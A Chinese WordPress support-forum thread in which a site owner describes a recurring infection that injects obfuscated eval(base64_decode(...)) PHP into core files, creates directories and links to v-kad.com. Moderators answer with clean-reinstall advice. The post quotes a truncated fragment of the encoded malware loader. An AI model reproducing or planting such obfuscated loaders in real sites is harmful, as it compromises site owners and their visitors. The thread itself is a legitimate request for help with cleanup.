支持 » 经验交流 » 网站被黑,无法清除,求助

  • rinkeliu

    (@rinkeliu)


    访问网站时,会看到有到v-kad.com的数据链接,index.php,或者wp-config.php,wp-setting,wp-setting.php会被修改添加eval(base64_decode(“aWYgKCFkZWZpbmVkKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JykpCnsKZGVmaW5lKCdBTFJFQURZX1JVTl8xYmMyOWIzNmYzNDJhODJhYWY2NjU4Nzg1MzU2NzE4JywgMSk7CgogJHRjc2hqd3hjID0gMjE1OyBmdW5jdGlvbiBhand3dHBwZmcoJHhpZm9pc2EsICRkaHVzZHNsYil7JHVjbWRqYXNlbiA9ICcnOyBmb3IoJGk9MDsgJGkgPCBzdHJsZW4oJHhpZm9pc2EpOyAkaSsrKXskdWNtZGphc2VuIC49IGlzc2V0KCRkaHVzZHNs…..);
    这样加密后的PHP代码,还会建立子目录。
    我把文件中所有这种代码清理掉,目录删除,过一阵子又会出来文件被修改,目录又被建立。
    FTP密码,数据库密码都已经修改过了,文件照样被修改,加入代码,目录还是会被创建。

    大家有没有见过这样的手法,能否协助我清除此黑客行为。

查看 6 回复 - 1 至 6 (总计 6)
  • 版主 Dallas Lu

    (@dallaslu)

    重新另建运行环境吧,把 WordPress 的内容通过 xml 格式导出后还原到新的 WordPress 里。

    帖子发表于 rinkeliu

    (@rinkeliu)

    那内容中的图片呢?图片文件很多。我是很想了解,这种黑入手法的机制。

    诗语

    (@f2010525)

    是通过 php 代码自动生成的木马文件,这个你删不干净,也删不完。

    我们以前遇到的情况记录贴:

    http://bbs.weixiaoduo.com/topic/17556

    图片打包备份下载,导出网站文章数据.xml 文件,同时搜索下文章中的 内容,如 .net .com 此类域名,有异常内容一律删除。

    重装,恢复数据,其他没啥。

    参考资料:

    http://doc.weixiaoduo.com/wordpress/16792.html

    http://doc.weixiaoduo.com/wordpress/3492.html

    • 该回复由诗语 于 6年前 修正。
    帖子发表于 rinkeliu

    (@rinkeliu)

    非常感谢!!

    帖子发表于 rinkeliu

    (@rinkeliu)

    内容通过 xml 格式导出后还原到新的 WordPress ,原来那些上传的图片文件怎么办,就是把upload目录还copy回去就可以了?

    版主 Dallas Lu

    (@dallaslu)

    这样是可以的。

查看 6 回复 - 1 至 6 (总计 6)
  • 话题 ‘网站被黑,无法清除,求助’不再接受新回复。